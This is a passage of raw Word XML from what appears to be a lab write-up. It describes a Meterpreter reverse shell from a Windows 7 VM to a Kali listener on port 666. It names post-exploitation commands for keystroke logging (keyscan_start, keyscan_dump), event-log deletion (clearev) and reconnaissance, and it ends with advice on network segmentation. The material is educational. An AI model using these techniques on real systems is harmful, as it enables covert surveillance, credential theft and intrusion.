        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> - set listening port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10297063" w14:textId="2E8DE456" w:rsidR="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="538F44AF" w14:textId="33C9CA1A" w:rsidR="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Now that our attacking machine is actively listening on port 666, we need to switch back to the Windows machine and run ‘calc.exe’, the cursor spins but then seemingly nothing happens. We switch back to the Kali </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>VM</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and we see that a new Meterpreter session has been opened from 10.1.112.145. We are now presented with a ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>‘ prompt</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>, and if we type in ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>’ we see that it’s actually a shell on the Windows 7 VM. Metasploit has many tools to let us pivot in the host and try to escalate our privileges, as well as other surveillance items like a keystroke logger that silently records in the background. Simply entering `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>keyscan_start</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>` starts the recording of all keystrokes that are entered on the Windows VM, then typing in `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>keyscan_dump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>` prints out everything that was captured.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E9A112" w14:textId="77777777" w:rsidR="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11468061" wp14:editId="56FA9C7C">
            <wp:extent cx="5284033" cy="888500"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="32" name="Picture 3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Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5290475" cy="889583"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA863CC" w14:textId="104ED23D" w:rsidR="00905DB6" w:rsidRPr="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> - active reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7D6573" w14:textId="77777777" w:rsidR="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DDB8419" wp14:editId="70AADC5C">
            <wp:extent cx="3095469" cy="973067"/>
            <wp:effectExtent l="0" t="0" r="3810" b="5080"/>
            <wp:docPr id="33" name="Picture 3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descr="Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3136427" cy="985942"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D7F1F9" w14:textId="47C6CF36" w:rsidR="00905DB6" w:rsidRPr="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> - showing system information from the Windows VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B06E8B" w14:textId="77777777" w:rsidR="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="054C1D4B" wp14:editId="093C4A96">
            <wp:extent cx="3867462" cy="905151"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="34" name="Picture 34"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descr="Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3894329" cy="911439"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F4C318" w14:textId="53BC5B8B" w:rsidR="00905DB6" w:rsidRPr="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> - starting the keystroke logger and monitoring results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E21CD4D" w14:textId="5221774D" w:rsidR="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t>From this point, an attacker and just sit and wait capturing passwords and any other text that is typed in, but there are other commands that can be run to help identify other weaknesses and potential attack targets. If we type in ‘help’ it prints a list of available commands at our disposal. We can send the active session to the background by typing `background` and then we can list the active sessions and choose which one we want to interact with. We switch back to the Windows VM session and decided to see how much access we have. We run `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>` and then change our directory to `c:\users` and try to navigate into the ‘Administrator’ user but are denied and told that we don’t have access. We can even delete event logs by typing `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>clearev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">` </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>as long as</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> we have admin rights, which we don’t have on this machine. We can type `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">` to see what user we are </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>actually logged</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in as, and then `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>idletime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">` to see the last time that they interacted with the machine. We can also view network information like the victim IP and subnet, which could allow further lateral movement once credentials have been harvested. This attack worked because these two machines are both on a very large internal subnet. This could be prevented in many ways, but from a network administrator </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>stand point</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> the network should be segmented into much smaller subnets with either an internal firewall or at the very least access control lists between them. There is no reason why port 666 should be allowed to transit between networks, but when the two hosts are layer-2 adjacent it’s difficult to limit the communication between them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0998E9B8" w14:textId="77777777" w:rsidR="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58FAB428" wp14:editId="39DB34D2">
            <wp:extent cx="3854614" cy="3020518"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="35" name="Picture 35"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Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3864372" cy="3028164"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0365E0A9" w14:textId="0685673E" w:rsidR="00905DB6" w:rsidRPr="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Meterpreter help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BD6E62" w14:textId="77777777" w:rsidR="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6238E661" wp14:editId="3AC809E2">
            <wp:extent cx="3957403" cy="1271499"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="36" name="Picture 36"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Graphical user interface, text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3990982" cy="1282288"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="203C13CC" w14:textId="5D1BB1ED" w:rsidR="00905DB6" w:rsidRPr="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> - list Meterpreter sessions and select session 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22224DA6" w14:textId="77777777" w:rsidR="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="141A61C5" wp14:editId="198162EE">
            <wp:extent cx="3627620" cy="3437506"/>
            <wp:effectExtent l="0" t="0" r="5080" b="4445"/>
            <wp:docPr id="37" name="Picture 37" descr="Tex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 name="Picture 37" descr="Text&#10;&#10;Description automatically generated with medium confidence"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3645687" cy="3454627"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD28DE9" w14:textId="50BEDCDE" w:rsidR="00905DB6" w:rsidRPr="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> - gather information about the host and current directory and contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAD4F85" w14:textId="77777777" w:rsidR="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57C925D6" wp14:editId="0678A3C5">
            <wp:extent cx="2660754" cy="1374723"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
